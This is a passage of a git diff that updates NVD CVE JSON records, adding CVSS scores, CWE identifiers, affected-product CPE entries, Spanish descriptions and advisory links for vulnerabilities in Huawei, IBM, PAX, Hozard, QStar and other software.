}, { "source": "psirt@huawei.com", "type": "Secondary", @@ -27,14 +60,52 @@ ] } ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:emui:13.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "353AEAF2-AF46-4835-93E1-4F942D5E2810" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:3.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "CB3751C1-7729-41D3-AE50-80B5AF601135" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:3.1.0:*:*:*:*:*:*:*", + "matchCriteriaId": "4D81C4EF-7CAF-4E60-91A4-8CF7B95B2B54" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:4.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "8198CDB2-4BC5-411A-8736-615A531FC545" + } + ] + } + ] + } + ], "references": [ { "url": "https://consumer.huawei.com/en/support/bulletin/2024/1/", - "source": "psirt@huawei.com" + "source": "psirt@huawei.com", + "tags": [ + "Vendor Advisory" + ] }, { "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202401-0000001799925977", - "source": "psirt@huawei.com" + "source": "psirt@huawei.com", + "tags": [ + "Vendor Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-45xx/CVE-2023-4566.json b/CVE-2023/CVE-2023-45xx/CVE-2023-4566.json index b276822125f..d4fbe8dd060 100644 --- a/CVE-2023/CVE-2023-45xx/CVE-2023-4566.json +++ b/CVE-2023/CVE-2023-45xx/CVE-2023-4566.json @@ -2,8 +2,8 @@ "id": "CVE-2023-4566", "sourceIdentifier": "psirt@huawei.com", "published": "2024-01-16T08:15:08.670", - "lastModified": "2024-01-16T13:56:05.467", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T16:12:13.313", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -14,8 +14,41 @@ "value": "Vulnerabilidad de relaciones de confianza siendo inexactas en escenarios distribuidos. La explotaci\u00f3n exitosa de esta vulnerabilidad puede afectar la confidencialidad del servicio." } ], - "metrics": {}, + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "NONE", + "availabilityImpact": "NONE", + "baseScore": 7.5, + "baseSeverity": "HIGH" + }, + "exploitabilityScore": 3.9, + "impactScore": 3.6 + } + ] + }, "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "NVD-CWE-noinfo" + } + ] + }, { "source": "psirt@huawei.com", "type": "Secondary", @@ -27,14 +60,52 @@ ] } ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:emui:13.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "353AEAF2-AF46-4835-93E1-4F942D5E2810" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:3.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "CB3751C1-7729-41D3-AE50-80B5AF601135" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:3.1.0:*:*:*:*:*:*:*", + "matchCriteriaId": "4D81C4EF-7CAF-4E60-91A4-8CF7B95B2B54" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:4.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "8198CDB2-4BC5-411A-8736-615A531FC545" + } + ] + } + ] + } + ], "references": [ { "url": "https://consumer.huawei.com/en/support/bulletin/2024/1/", - "source": "psirt@huawei.com" + "source": "psirt@huawei.com", + "tags": [ + "Vendor Advisory" + ] }, { "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202401-0000001799925977", - "source": "psirt@huawei.com" + "source": "psirt@huawei.com", + "tags": [ + "Vendor Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-462xx/CVE-2023-46219.json b/CVE-2023/CVE-2023-462xx/CVE-2023-46219.json index 207db0154f2..0c12373fef8 100644 --- a/CVE-2023/CVE-2023-462xx/CVE-2023-46219.json +++ b/CVE-2023/CVE-2023-462xx/CVE-2023-46219.json @@ -2,7 +2,7 @@ "id": "CVE-2023-46219", "sourceIdentifier": "support@hackerone.com", "published": "2023-12-12T02:15:06.990", - "lastModified": "2023-12-24T13:15:08.290", + "lastModified": "2024-01-19T16:15:09.430", "vulnStatus": "Modified", "descriptions": [ { @@ -107,6 +107,10 @@ "Third Party Advisory" ] }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0007/", + "source": "support@hackerone.com" + }, { "url": "https://www.debian.org/security/2023/dsa-5587", "source": "support@hackerone.com" diff --git a/CVE-2023/CVE-2023-463xx/CVE-2023-46351.json b/CVE-2023/CVE-2023-463xx/CVE-2023-46351.json index ecfe4ab20df..77597f4917d 100644 --- a/CVE-2023/CVE-2023-463xx/CVE-2023-46351.json +++ b/CVE-2023/CVE-2023-463xx/CVE-2023-46351.json @@ -2,8 +2,8 @@ "id": "CVE-2023-46351", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-19T14:15:12.367", - "lastModified": "2024-01-19T14:15:12.367", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", diff --git a/CVE-2023/CVE-2023-477xx/CVE-2023-47701.json b/CVE-2023/CVE-2023-477xx/CVE-2023-47701.json index cb6162fe95e..3cce49e2cb6 100644 --- a/CVE-2023/CVE-2023-477xx/CVE-2023-47701.json +++ b/CVE-2023/CVE-2023-477xx/CVE-2023-47701.json @@ -2,8 +2,8 @@ "id": "CVE-2023-47701", "sourceIdentifier": "psirt@us.ibm.com", "published": "2023-12-04T01:15:12.340", - "lastModified": "2023-12-07T17:35:00.827", - "vulnStatus": "Analyzed", + "lastModified": "2024-01-19T16:15:09.547", + "vulnStatus": "Modified", "descriptions": [ { "lang": "en", @@ -144,6 +144,10 @@ "Vendor Advisory" ] }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0001/", + "source": "psirt@us.ibm.com" + }, { "url": "https://www.ibm.com/support/pages/node/7087180", "source": "psirt@us.ibm.com", diff --git a/CVE-2023/CVE-2023-477xx/CVE-2023-47718.json b/CVE-2023/CVE-2023-477xx/CVE-2023-47718.json index 489ec8e1fc3..37412a8a6b7 100644 --- a/CVE-2023/CVE-2023-477xx/CVE-2023-47718.json +++ b/CVE-2023/CVE-2023-477xx/CVE-2023-47718.json @@ -2,12 +2,16 @@ "id": "CVE-2023-47718", "sourceIdentifier": "psirt@us.ibm.com", "published": "2024-01-19T02:15:07.757", - "lastModified": "2024-01-19T02:15:07.757", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:26.533", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", "value": "IBM Maximo Asset Management 7.6.1.3 and Manage Component 8.10 through 8.11 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 271843." + }, + { + "lang": "es", + "value": "IBM Maximo Asset Management 7.6.1.3 y Manage Component 8.10 a 8.11 son vulnerables a cross-site request forgery, lo que podr\u00eda permitir a un atacante ejecutar acciones maliciosas y no autorizadas transmitidas por un usuario en el que conf\u00eda el sitio web. ID de IBM X-Force: 271843." } ], "metrics": { diff --git a/CVE-2023/CVE-2023-48xx/CVE-2023-4818.json b/CVE-2023/CVE-2023-48xx/CVE-2023-4818.json index 4d0d19a3ab3..cc3f6483d52 100644 --- a/CVE-2023/CVE-2023-48xx/CVE-2023-4818.json +++ b/CVE-2023/CVE-2023-48xx/CVE-2023-4818.json @@ -2,8 +2,8 @@ "id": "CVE-2023-4818", "sourceIdentifier": "cvd@cert.pl", "published": "2024-01-15T14:15:25.180", - "lastModified": "2024-01-16T13:56:05.467", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T16:35:49.683", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -14,8 +14,41 @@ "value": "El dispositivo PAX A920 permite degradar el gestor de arranque debido a un error en la verificaci\u00f3n de versi\u00f3n. La firma est\u00e1 correctamente comprobada y s\u00f3lo se puede utilizar el gestor de arranque firmado por PAX. El atacante debe tener acceso USB f\u00edsico al dispositivo para poder aprovechar esta vulnerabilidad." } ], - "metrics": {}, + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "attackVector": "PHYSICAL", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "CHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "HIGH", + "availabilityImpact": "HIGH", + "baseScore": 7.6, + "baseSeverity": "HIGH" + }, + "exploitabilityScore": 0.9, + "impactScore": 6.0 + } + ] + }, "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-74" + } + ] + }, { "source": "cvd@cert.pl", "type": "Secondary", @@ -27,22 +60,64 @@ ] } ], + "configurations": [ + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:7.1.2_aquarius_11.1.50_20230614:*:*:*:*:*:*:*", + "matchCriteriaId": "034C08E1-1DEB-43D2-A38A-736E1FEDE45C" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a920:-:*:*:*:*:*:*:*", + "matchCriteriaId": "D351F870-D43F-48B4-B2AC-0FDDD7B82ED4" + } + ] + } + ] + } + ], "references": [ { "url": "https://blog.stmcyber.com/pax-pos-cves-2023/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Exploit", + "Third Party Advisory" + ] }, { "url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://cert.pl/posts/2024/01/CVE-2023-4818/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://ppn.paxengine.com/release/development", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Permissions Required" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-492xx/CVE-2023-49285.json b/CVE-2023/CVE-2023-492xx/CVE-2023-49285.json index 667befdd495..050f901a6cd 100644 --- a/CVE-2023/CVE-2023-492xx/CVE-2023-49285.json +++ b/CVE-2023/CVE-2023-492xx/CVE-2023-49285.json @@ -2,7 +2,7 @@ "id": "CVE-2023-49285", "sourceIdentifier": "security-advisories@github.com", "published": "2023-12-04T23:15:27.007", - "lastModified": "2024-01-09T02:15:44.903", + "lastModified": "2024-01-19T16:15:09.653", "vulnStatus": "Modified", "descriptions": [ { @@ -145,6 +145,10 @@ { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MEV66D3PAAY6K7TWDT3WZBLCPLASFJDC/", "source": "security-advisories@github.com" + }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0004/", + "source": "security-advisories@github.com" } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-492xx/CVE-2023-49286.json b/CVE-2023/CVE-2023-492xx/CVE-2023-49286.json index 61846a62c40..91e628c08e5 100644 --- a/CVE-2023/CVE-2023-492xx/CVE-2023-49286.json +++ b/CVE-2023/CVE-2023-492xx/CVE-2023-49286.json @@ -2,7 +2,7 @@ "id": "CVE-2023-49286", "sourceIdentifier": "security-advisories@github.com", "published": "2023-12-04T23:15:27.243", - "lastModified": "2024-01-09T02:15:45.030", + "lastModified": "2024-01-19T16:15:09.793", "vulnStatus": "Modified", "descriptions": [ { @@ -139,6 +139,10 @@ { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MEV66D3PAAY6K7TWDT3WZBLCPLASFJDC/", "source": "security-advisories@github.com" + }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0004/", + "source": "security-advisories@github.com" } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-492xx/CVE-2023-49288.json b/CVE-2023/CVE-2023-492xx/CVE-2023-49288.json index 99a63c45473..841caafb685 100644 --- a/CVE-2023/CVE-2023-492xx/CVE-2023-49288.json +++ b/CVE-2023/CVE-2023-492xx/CVE-2023-49288.json @@ -2,7 +2,7 @@ "id": "CVE-2023-49288", "sourceIdentifier": "security-advisories@github.com", "published": "2023-12-04T23:15:27.477", - "lastModified": "2023-12-29T03:15:11.580", + "lastModified": "2024-01-19T16:15:09.930", "vulnStatus": "Modified", "descriptions": [ { @@ -104,6 +104,10 @@ { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MEV66D3PAAY6K7TWDT3WZBLCPLASFJDC/", "source": "security-advisories@github.com" + }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0006/", + "source": "security-advisories@github.com" } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-500xx/CVE-2023-50028.json b/CVE-2023/CVE-2023-500xx/CVE-2023-50028.json index eacd5ddb280..87d48118f61 100644 --- a/CVE-2023/CVE-2023-500xx/CVE-2023-50028.json +++ b/CVE-2023/CVE-2023-500xx/CVE-2023-50028.json @@ -2,8 +2,8 @@ "id": "CVE-2023-50028", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-19T14:15:12.413", - "lastModified": "2024-01-19T14:15:12.413", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", diff --git a/CVE-2023/CVE-2023-500xx/CVE-2023-50030.json b/CVE-2023/CVE-2023-500xx/CVE-2023-50030.json index 1de2ec7e483..fa2a2efa51f 100644 --- a/CVE-2023/CVE-2023-500xx/CVE-2023-50030.json +++ b/CVE-2023/CVE-2023-500xx/CVE-2023-50030.json @@ -2,8 +2,8 @@ "id": "CVE-2023-50030", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-19T14:15:12.453", - "lastModified": "2024-01-19T14:15:12.453", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", diff --git a/CVE-2023/CVE-2023-501xx/CVE-2023-50123.json b/CVE-2023/CVE-2023-501xx/CVE-2023-50123.json index 2bbbfe9db40..b5252ad99a4 100644 --- a/CVE-2023/CVE-2023-501xx/CVE-2023-50123.json +++ b/CVE-2023/CVE-2023-501xx/CVE-2023-50123.json @@ -2,8 +2,8 @@ "id": "CVE-2023-50123", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-11T21:15:10.573", - "lastModified": "2024-01-12T13:47:31.250", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:10:06.827", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -14,11 +14,67 @@ "value": "El n\u00famero de intentos para desarmar Hozard Alarm system (alarmsystemen) v1.0 no est\u00e1 limitado. Esto podr\u00eda permitir a un atacante realizar una fuerza bruta en la autenticaci\u00f3n por SMS para desarmar el sistema de alarma." } ], - "metrics": {}, + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "attackVector": "NETWORK", + "attackComplexity": "HIGH", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "HIGH", + "availabilityImpact": "HIGH", + "baseScore": 8.1, + "baseSeverity": "HIGH" + }, + "exploitabilityScore": 2.2, + "impactScore": 5.9 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-307" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:hozard:alarm_system:1.0:*:*:*:*:*:*:*", + "matchCriteriaId": "8F9A297A-6C1D-4276-8153-C23EE75FB0BB" + } + ] + } + ] + } + ], "references": [ { "url": "https://www.secura.com/services/iot/consumer-products/security-concerns-in-popular-smart-home-devices", - "source": "cve@mitre.org" + "source": "cve@mitre.org", + "tags": [ + "Exploit", + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-501xx/CVE-2023-50125.json b/CVE-2023/CVE-2023-501xx/CVE-2023-50125.json index 994cc16a1e9..4a84d8a2d27 100644 --- a/CVE-2023/CVE-2023-501xx/CVE-2023-50125.json +++ b/CVE-2023/CVE-2023-501xx/CVE-2023-50125.json @@ -2,8 +2,8 @@ "id": "CVE-2023-50125", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-11T21:15:10.680", - "lastModified": "2024-01-12T13:47:31.250", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:32:56.977", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -14,11 +14,66 @@ "value": "Una contrase\u00f1a de ingeniero predeterminada establecida en Hozard alarm system (Alarmsysteem) v1.0 permite a un atacante desarmar el sistema de alarma." } ], - "metrics": {}, + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "attackVector": "NETWORK", + "attackComplexity": "HIGH", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "NONE", + "availabilityImpact": "NONE", + "baseScore": 5.9, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 2.2, + "impactScore": 3.6 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-522" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:hozard:alarm_system:1.0:*:*:*:*:*:*:*", + "matchCriteriaId": "8F9A297A-6C1D-4276-8153-C23EE75FB0BB" + } + ] + } + ] + } + ], "references": [ { "url": "https://www.secura.com/services/iot/consumer-products/security-concerns-in-popular-smart-home-devices", - "source": "cve@mitre.org" + "source": "cve@mitre.org", + "tags": [ + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-501xx/CVE-2023-50128.json b/CVE-2023/CVE-2023-501xx/CVE-2023-50128.json index ae90d1be65a..55fc52b6396 100644 --- a/CVE-2023/CVE-2023-501xx/CVE-2023-50128.json +++ b/CVE-2023/CVE-2023-501xx/CVE-2023-50128.json @@ -2,8 +2,8 @@ "id": "CVE-2023-50128", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-11T21:15:10.817", - "lastModified": "2024-01-12T13:47:31.250", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:29:21.510", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -14,15 +14,73 @@ "value": "El sistema remoto sin llave del sistema de Hozard alarm system (alarmsystemen) v1.0 env\u00eda una se\u00f1al de radiofrecuencia id\u00e9ntica para cada solicitud, lo que da como resultado que un atacante pueda realizar ataques de repetici\u00f3n para desarmar el sistema de alarma." } ], - "metrics": {}, + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", + "attackVector": "ADJACENT_NETWORK", + "attackComplexity": "HIGH", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "NONE", + "integrityImpact": "HIGH", + "availabilityImpact": "NONE", + "baseScore": 5.3, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 1.6, + "impactScore": 3.6 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-294" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:hozard:alarm_system:1.0:*:*:*:*:*:*:*", + "matchCriteriaId": "8F9A297A-6C1D-4276-8153-C23EE75FB0BB" + } + ] + } + ] + } + ], "references": [ { "url": "http://hozard.com", - "source": "cve@mitre.org" + "source": "cve@mitre.org", + "tags": [ + "Product" + ] }, { "url": "https://www.secura.com/services/iot/consumer-products/security-concerns-in-popular-smart-home-devices", - "source": "cve@mitre.org" + "source": "cve@mitre.org", + "tags": [ + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-502xx/CVE-2023-50269.json b/CVE-2023/CVE-2023-502xx/CVE-2023-50269.json index 907e95399ee..bdc475d3534 100644 --- a/CVE-2023/CVE-2023-502xx/CVE-2023-50269.json +++ b/CVE-2023/CVE-2023-502xx/CVE-2023-50269.json @@ -2,7 +2,7 @@ "id": "CVE-2023-50269", "sourceIdentifier": "security-advisories@github.com", "published": "2023-12-14T18:15:45.070", - "lastModified": "2024-01-09T02:15:45.280", + "lastModified": "2024-01-19T16:15:10.063", "vulnStatus": "Modified", "descriptions": [ { @@ -184,6 +184,10 @@ { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MEV66D3PAAY6K7TWDT3WZBLCPLASFJDC/", "source": "security-advisories@github.com" + }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0005/", + "source": "security-advisories@github.com" } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-504xx/CVE-2023-50495.json b/CVE-2023/CVE-2023-504xx/CVE-2023-50495.json index 06eb7e04751..881280df918 100644 --- a/CVE-2023/CVE-2023-504xx/CVE-2023-50495.json +++ b/CVE-2023/CVE-2023-504xx/CVE-2023-50495.json @@ -2,8 +2,8 @@ "id": "CVE-2023-50495", "sourceIdentifier": "cve@mitre.org", "published": "2023-12-12T15:15:07.867", - "lastModified": "2023-12-18T18:30:24.743", - "vulnStatus": "Analyzed", + "lastModified": "2024-01-19T16:15:10.193", + "vulnStatus": "Modified", "descriptions": [ { "lang": "en", @@ -83,6 +83,10 @@ "Mailing List", "Patch" ] + }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0008/", + "source": "cve@mitre.org" } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-509xx/CVE-2023-50963.json b/CVE-2023/CVE-2023-509xx/CVE-2023-50963.json index 8fb4a4e826f..7cdd10904d8 100644 --- a/CVE-2023/CVE-2023-509xx/CVE-2023-50963.json +++ b/CVE-2023/CVE-2023-509xx/CVE-2023-50963.json @@ -2,12 +2,16 @@ "id": "CVE-2023-50963", "sourceIdentifier": "psirt@us.ibm.com", "published": "2024-01-19T02:15:07.970", - "lastModified": "2024-01-19T02:15:07.970", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:26.533", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", "value": "IBM Storage Defender - Data Protect 1.0.0 through 1.4.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 276101." + }, + { + "lang": "es", + "value": "IBM Storage Defender - Data Protect 1.0.0 a 1.4.1 es vulnerable a la inyecci\u00f3n de encabezados HTTP, causada por una validaci\u00f3n incorrecta de la entrada por parte de los encabezados HOST. Esto podr\u00eda permitir que un atacante realice varios ataques contra el sistema vulnerable, incluido cross-site scripting, envenenamiento de cach\u00e9 o secuestro de sesi\u00f3n. ID de IBM X-Force: 276101." } ], "metrics": { diff --git a/CVE-2023/CVE-2023-510xx/CVE-2023-51062.json b/CVE-2023/CVE-2023-510xx/CVE-2023-51062.json index f2b44f8cc8c..34f30f32694 100644 --- a/CVE-2023/CVE-2023-510xx/CVE-2023-51062.json +++ b/CVE-2023/CVE-2023-510xx/CVE-2023-51062.json @@ -2,19 +2,79 @@ "id": "CVE-2023-51062", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-13T04:15:07.757", - "lastModified": "2024-01-14T21:42:17.123", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:51:22.653", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", "value": "An unauthenticated log file read in the component log-smblog-save of QStar Archive Solutions RELEASE_3-0 Build 7 Patch 0 allows attackers to disclose the SMB Log contents via executing a crafted command." + }, + { + "lang": "es", + "value": "Un archivo de registro no autenticado le\u00eddo en el componente log-smblog-save de QStar Archive Solutions RELEASE_3-0 Build 7 Patch 0 permite a los atacantes revelar el contenido del registro SMB mediante la ejecuci\u00f3n de un comando manipulado." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "LOW", + "integrityImpact": "NONE", + "availabilityImpact": "NONE", + "baseScore": 5.3, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 3.9, + "impactScore": 1.4 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-306" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*", + "matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B" + } + ] + } + ] } ], - "metrics": {}, "references": [ { "url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51062.md", - "source": "cve@mitre.org" + "source": "cve@mitre.org", + "tags": [ + "Exploit", + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-510xx/CVE-2023-51064.json b/CVE-2023/CVE-2023-510xx/CVE-2023-51064.json index 68ba147cf0a..f39bca9cfb9 100644 --- a/CVE-2023/CVE-2023-510xx/CVE-2023-51064.json +++ b/CVE-2023/CVE-2023-510xx/CVE-2023-51064.json @@ -2,19 +2,79 @@ "id": "CVE-2023-51064", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-13T04:15:07.870", - "lastModified": "2024-01-14T21:42:17.123", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:49:54.723", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", "value": "QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 was discovered to contain a DOM Based reflected XSS vulnerability within the component qnme-ajax?method=tree_table." + }, + { + "lang": "es", + "value": "Se descubri\u00f3 que QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0, contiene una vulnerabilidad de XSS reflejado basada en DOM dentro del componente qnme-ajax?method=tree_table." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "REQUIRED", + "scope": "CHANGED", + "confidentialityImpact": "LOW", + "integrityImpact": "LOW", + "availabilityImpact": "NONE", + "baseScore": 6.1, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 2.8, + "impactScore": 2.7 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-79" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*", + "matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B" + } + ] + } + ] } ], - "metrics": {}, "references": [ { "url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51064.md", - "source": "cve@mitre.org" + "source": "cve@mitre.org", + "tags": [ + "Exploit", + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-510xx/CVE-2023-51065.json b/CVE-2023/CVE-2023-510xx/CVE-2023-51065.json index 578c719a133..a2cacc3f821 100644 --- 